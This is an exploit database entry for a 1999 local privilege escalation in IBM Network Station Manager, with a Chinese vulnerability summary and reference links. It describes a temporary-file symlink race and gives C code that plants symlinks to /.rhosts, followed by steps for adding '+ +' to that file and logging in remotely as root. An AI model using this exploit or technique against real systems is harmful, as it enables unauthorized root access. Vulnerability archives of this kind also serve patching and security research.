https://www.exploit-db.com/exploits/19697
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-093

IBM网站管理者NetStation存在漏洞，本地用户利用该漏洞通过一个符号链接攻击获得特权。

source: http://www.securityfocus.com/bid/900/info

IBM's Network Station Manager is a client/server application which facilitates management for IBM Network Stations. It is possible to locally gain root priviliges on hosts running the NetStation daemon. NetStation (which runs as root) creates temporary files in /tmp with predictable filenames based on a known partial filename and the current system time, creating a race condition which can lead to root compromise if the race is won. A symlink would have to be created with a correct predicted filename that points to (for example) /.rhosts, causing NetStation to write to it. The attacker would then add "+ +" to the file, chown root it and rlogin (or rsh in) as root.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>

void main() {

/* Change these paths */
char dest[20] = "/.rhosts";
char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
long sec;
int i;
sec = time(0);
for (i = 0; i < 30; i++) {
sprintf(sourcesym, "%s%d", source, (sec + i));
symlink(dest,sourcesym);
}

}

来源:BID
名称:900
链接:http://www.securityfocus.com/bid/900
来源:BUGTRAQ
名称:19991227IBMNetStation/UnixWarelocalrootexploit
链接:http://www.securityfocus.com/archive/1/39962
来源:XF
名称:ibm-netstat-race-condition(5381)
链接:http://www.iss.net/security_center/static/5381.php